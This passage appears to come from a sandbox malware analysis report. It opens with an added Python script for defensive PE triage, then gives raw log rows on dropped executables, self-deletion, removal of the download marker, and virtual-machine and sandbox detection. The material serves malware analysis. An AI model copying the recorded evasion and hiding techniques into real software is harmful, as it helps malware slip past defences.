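The static PE rows above (random section names, blank section names, an entry point in .didata rather than .text, section entropy near 8.0, a stored checksum of 0 or one that disagrees with the computed value, and a link timestamp in 2061) are the checks an analyst reruns on every dropped file. The script below is an added example and not part of the Joe Sandbox report: a standard-library-only PE32 reader that performs those checks and reports them in the same notation as the report (`.text:ER`, "stored 0x0, computed 0x..."). The "standard section name" list, the 7.0 entropy threshold and the one-day tolerance on the timestamp are the example's own choices, not the sandbox's; `build_sample_pe()` constructs a tiny PE inline (test input, not one of the report's binaries) so the script runs offline.

```python
"""Added example (not from the sandbox report): a stdlib-only PE32 triage that
reproduces the report's static checks: non-standard section names, section
entropy, W+X section rights, which section holds the entry point, stored vs
computed checksum, and a link timestamp in the future. build_sample_pe()
constructs a tiny PE inline (test input, not a real binary) so it runs offline."""
import math
import struct
import time
from collections import Counter

STANDARD = {".text", ".rdata", ".data", ".rsrc", ".reloc", ".idata", ".edata",
            ".pdata", ".tls", ".bss", ".CRT"}        # example's list, not the sandbox's
SCN_EXECUTE, SCN_READ, SCN_WRITE = 0x20000000, 0x40000000, 0x80000000


def shannon_entropy(data):
    """Bits per byte: 0.0 for empty/constant input, 8.0 for a uniform byte mix."""
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values()) if n else 0.0


def pe_checksum(data, checksum_offset):
    """CheckSumMappedFile's algorithm: fold the dword sum to 16 bits and add the file
    length, skipping the dword that stores the checksum (assumed 4-aligned)."""
    padded = data + b"\0" * (-len(data) % 4)
    total = 0
    for off in range(0, len(padded), 4):
        if off != checksum_offset:
            total += struct.unpack_from("<I", padded, off)[0]
            if total >= 1 << 32:
                total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    return ((total + (total >> 16)) & 0xFFFF) + len(data)


def parse_pe(data):
    """COFF/optional header fields and the section table of a PE32 image."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    nsections, timestamp, opt_size = struct.unpack_from("<HI8xH", data, coff + 2)
    opt = coff + 20
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("only PE32 is handled here (PE32+ moves the field offsets)")
    sections = []
    for k in range(nsections):
        name, vsize, vaddr, rawsize, rawptr, chars = struct.unpack_from(
            "<8sIIII12xI", data, opt + opt_size + 40 * k)
        sections.append({"name": name.rstrip(b"\0").decode("latin-1"), "vaddr": vaddr,
                         "vsize": vsize, "chars": chars, "data": data[rawptr:rawptr + rawsize]})
    return {"timestamp": timestamp, "sections": sections, "checksum_offset": opt + 64,
            "entry_rva": struct.unpack_from("<I", data, opt + 16)[0],
            "stored_checksum": struct.unpack_from("<I", data, opt + 64)[0]}


def rights(chars):
    """Section rights in the report's notation ('.text:ER' -> 'ER')."""
    return "".join(f for f, b in (("E", SCN_EXECUTE), ("R", SCN_READ), ("W", SCN_WRITE)) if chars & b)


def triage(data, now=None):
    """(check, detail) findings in the spirit of the report's static PE rows."""
    pe = parse_pe(data)
    now = time.time() if now is None else now
    findings = []
    for s in pe["sections"]:
        tag = "%s:%s" % (s["name"] or "<blank>", rights(s["chars"]))
        if s["name"] not in STANDARD:
            findings.append(("nonstandard section name", tag))
        ent = shannon_entropy(s["data"])
        if ent > 7.0:                                  # packed/encrypted content
            findings.append(("high entropy", "%s %.2f" % (tag, ent)))
        if s["chars"] & SCN_WRITE and s["chars"] & SCN_EXECUTE:
            findings.append(("writable+executable section", tag))
        end = s["vaddr"] + max(s["vsize"], len(s["data"]))
        if s["vaddr"] <= pe["entry_rva"] < end and s["name"] != ".text":
            findings.append(("entry point outside .text", tag))
    computed = pe_checksum(data, pe["checksum_offset"])
    if pe["stored_checksum"] != computed:
        findings.append(("checksum mismatch", "stored 0x%x, computed 0x%x"
                         % (pe["stored_checksum"], computed)))
    if pe["timestamp"] > now + 86400:                  # more than a day ahead of now
        findings.append(("link timestamp in the future", "0x%08x" % pe["timestamp"]))
    return findings


def fix_checksum(data):
    """Rewrite the stored checksum so the image passes the checksum check."""
    off = parse_pe(data)["checksum_offset"]
    return data[:off] + struct.pack("<I", pe_checksum(data, off)) + data[off + 4:]


def build_sample_pe():
    """Constructed PE32: plain .text plus a packed, W+X section named in the sample's
    style that holds the entry point; checksum 0 and the report's 2061 timestamp."""
    secs = [(b".text", b"\xC3" * 0x200, SCN_EXECUTE | SCN_READ),                      # entropy 0
            (b".civujo", bytes(range(256)) * 8, SCN_EXECUTE | SCN_READ | SCN_WRITE)]  # entropy 8
    e_lfanew, opt_size, hdr_size = 0x40, 0xE0, 0x400
    raw_off, vaddr, entry, table, body = hdr_size, 0x1000, 0, b"", b""
    for name, payload, chars in secs:
        table += struct.pack("<8sIIIIIIHHI", name, len(payload), vaddr, len(payload),
                             raw_off, 0, 0, 0, 0, chars)
        body += payload
        entry = vaddr if name == b".civujo" else entry   # entry point in the packed section
        raw_off, vaddr = raw_off + len(payload), vaddr + 0x1000
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, len(secs), 0xAB35ADD6, 0, 0, opt_size, 0x0102)
    opt = struct.pack("<HBB" + "I" * 9 + "H" * 6 + "I" * 4 + "HH" + "I" * 6,
                      0x10B, 0, 0, 0x200, 0x800, 0, entry, 0x1000, 0x2000, 0x400000,
                      0x1000, 0x200, 4, 0, 0, 0, 4, 0, 0, vaddr, hdr_size, 0, 2, 0,
                      0x100000, 0x1000, 0x100000, 0x1000, 0, 16) + b"\0" * 128
    head = dos + b"PE\0\0" + coff + opt + table
    return head + b"\0" * (hdr_size - len(head)) + body
```

Run `triage(open(path, "rb").read())` on a dropped file to get the same kind of rows the report shows; `fix_checksum()` is there to demonstrate that a checksum of 0 (as on FD6B.exe, 656C.exe and 14F6.exe above) is not an error in the tool but a value the build simply never filled in, which is typical of hand-assembled or post-processed packer output. A legitimate Delphi binary also carries a .didata section and an entry point there can be benign, so the entry-point check is a prompt to look, not a verdict on its own.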
Source: FD6B.exe.11.dr, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs | High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
Source: FD6B.exe.11.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | High entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
Source: 26.0.FD6B.exe.cf0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | High entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
Source: 26.0.FD6B.exe.cf0000.0.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs | High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
Source: 26.2.FD6B.exe.cf0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | High entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
Source: 26.2.FD6B.exe.cf0000.0.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs | High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
Source: 26.0.FD6B.exe.cf0000.3.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs | High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
Source: 26.0.FD6B.exe.cf0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | High entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
Source: 26.0.FD6B.exe.cf0000.2.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs | High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
Source: 26.0.FD6B.exe.cf0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | High entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
Source: 26.0.FD6B.exe.cf0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | High entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
Source: 26.0.FD6B.exe.cf0000.1.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs | High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
Source: 42.0.FD6B.exe.1a0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | High entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
Source: 42.0.FD6B.exe.1a0000.1.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs | High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
Source: 42.0.FD6B.exe.1a0000.0.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs | High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
Source: 42.0.FD6B.exe.1a0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | High entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Roaming\iscgwer
Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Roaming\iscgwer
Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\7480.exe
Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\433C.exe
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Windows\SysWOW64\jdijwvkg\bzxmernq.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\F4CF.exe | File created: C:\Users\user\AppData\Local\Temp\bzxmernq.exe
Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\FD6B.exe
Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\411E.exe
Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\E6C4.exe
Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\27E3.exe
Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\656C.exe
Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\FE11.exe
Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\14F6.exe
Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\53A8.exe
Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\53DC.exe
Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\D54.exe
Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\F4CF.exe
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Windows\SysWOW64\jdijwvkg\bzxmernq.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\F4CF.exe | Code function: 25_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Deletes itself after installation
                      Source: C:\Windows\explorer.exe File deleted: c:\users\user\desktop\9ro85qvn0f.exe
                      Hides that the sample has been downloaded from the Internet (zone.identifier)
                      Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Roaming\iscgwer:Zone.Identifier read attributes | delete
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exe Code function: 24_2_0040C2E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FindAtomW,FindAtomW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,
                      Source: C:\Windows\System32\svchost.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\F4CF.exe Process information set: NOGPFAULTERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\F4CF.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\F4CF.exe Process information set: NOGPFAULTERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exe Process information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      Found evasive API chain (may stop execution after checking mutex)
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exe Evasive API call chain: CreateMutex,DecisionNodes,Sleep
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                      Source: 53DC.exe, 00000016.00000002.420605551.000000000042B000.00000004.00000020.sdmp Binary or memory string: ASWHOOK
                      Source: 9ro85QVN0F.exe, 00000001.00000002.340348642.0000000001F60000.00000004.00000001.sdmp Binary or memory string: ASWHOOKW
                      Found evasive API chain (may stop execution after checking locale)
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exe Evasive API call chain: GetUserDefaultLangID, ExitProcess
                      Checks if the current machine is a virtual machine (disk enumeration)
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\iscgwer Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Local\Temp\53DC.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exe Evasive API call chain: GetPEB, DecisionNodes, Sleep
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
                      Contains functionality to detect sleep reduction / modifications
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exe Code function: 24_2_00406AA0
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exe Code function: 24_2_00666CF0
                      Found evasive API chain (may stop execution after checking computer name)
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exe Evasive API call chain: GetComputerName,DecisionNodes,Sleep
                      Source: C:\Windows\explorer.exe TID: 4940 Thread sleep count: 576 > 30
                      Source: C:\Windows\explorer.exe TID: 5104 Thread sleep count: 181 > 30
                      Source: C:\Windows\explorer.exe TID: 5244 Thread sleep count: 196 > 30
                      Source: C:\Windows\explorer.exe TID: 1760 Thread sleep count: 388 > 30
                      Source: C:\Windows\explorer.exe TID: 2888 Thread sleep count: 97 > 30
                      Source: C:\Windows\explorer.exe TID: 3396 Thread sleep count: 342 > 30
                      Source: C:\Windows\explorer.exe TID: 5608 Thread sleep count: 106 > 30
                      Source: C:\Windows\explorer.exe TID: 4412 Thread sleep count: 127 > 30
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exe TID: 488 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 2524 Thread sleep time: -210000s >= -30000s
                      Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Temp\F4CF.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\explorer.exe Window / User API: threadDelayed 576
                      Source: C:\Windows\explorer.exe Window / User API: threadDelayed 388
                      Source: C:\Users\user\AppData\Local\Temp\411E.exe API coverage: 0.3 %
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exe API coverage: 6.3 %
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exe Code function: 24_2_00666CF0
                      Source: C:\Windows\explorer.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\7480.exe
                      Source: C:\Windows\SysWOW64\cmd.exe Dropped PE file which has not been started: C:\Windows\SysWOW64\jdijwvkg\bzxmernq.exe (copy)
                      Source: C:\Windows\explorer.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\433C.exe
                      Source: C:\Users\user\AppData\Local\Temp\F4CF.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\bzxmernq.exe
                      Source: C:\Windows\explorer.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\27E3.exe
                      Source: C:\Windows\explorer.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\656C.exe
                      Source: C:\Windows\explorer.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\FE11.exe
                      Source: C:\Windows\explorer.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\14F6.exe
                      Source: C:\Windows\explorer.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\53A8.exe
                      Source: C:\Windows\explorer.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\D54.exe
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exe Evaded block: after key decision
                      Source: C:\Users\user\AppData\Local\Temp\F4CF.exe Evaded block: after key decision
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exe API call chain: ExitProcess graph end node
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exe API call chain: ExitProcess graph end node
                      Source: explorer.exe, 0000000B.00000000.318523624.00000000086C9000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 0000000B.00000000.331623884.0000000008778000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
                      Source: explorer.exe, 0000000B.00000000.300992285.000000000EE50000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Program""
                      Source: explorer.exe, 0000000B.00000000.318523624.00000000086C9000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
                      Source: explorer.exe, 0000000B.00000000.329664757.00000000067C2000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: svchost.exe, 0000001D.00000002.457727058.000001A703C6F000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAWPC
                      Source: explorer.exe, 0000000B.00000000.329664757.00000000067C2000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
                      Source: svchost.exe, 00000002.00000002.566720985.0000022DCB402000.00000004.00000001.sdmp Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
                      Source: svchost.exe, 0000001D.00000002.458320425.000001A703CD9000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.458361159.000001A703CEA000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
                      Source: explorer.exe, 0000000B.00000000.318523624.00000000086C9000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
                      Source: svchost.exe, 00000002.00000002.575083417.0000022DCB43C000.00000004.00000001.sdmp, svchost.exe, 00000003.00000002.585906895.00000272F7E68000.00000004.00000001.sdmp, svchost.exe, 00000004.00000002.573702769.0000021C9DE29000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exe Process information queried: ProcessInformation
                      Source: C:\Users\user\AppData\Local\Temp\F4CF.exe Code function: 25_2_00401D96 CreateThread,GetVersionExA,GetSystemInfo,GetModuleHandleA,GetProcAddress,GetCurrentProcess,GetTickCount,
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exe Code function: 0_2_00419AC1 GetPrivateProfileSectionW,BuildCommDCBAndTimeoutsW,CreateMailslotA,CallNamedPipeA,ReleaseSemaphore,FindAtomA,SystemTimeToTzSpecificLocalTime,SetComputerNameExA,SetConsoleCursorInfo,TlsGetValue,CopyFileA,GetLongPathNameW,SetVolumeMountPointW,SetProcessPriorityBoost,FreeEnvironmentStringsA,GetDriveTypeA,FindFirstFileExW,
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exe Code function: 24_2_00405E40 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exe Code function: 24_2_004096E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exe Code function: 24_2_00401280 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exe Code function: 24_2_00401090 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exe Code function: 24_2_00409B40 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exe Code function: 24_2_00409970 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exe Code function: 24_2_004087E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exe Code function: 24_2_00668A30 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exe Code function: 24_2_006612E0 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exe Code function: 24_2_006614D0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
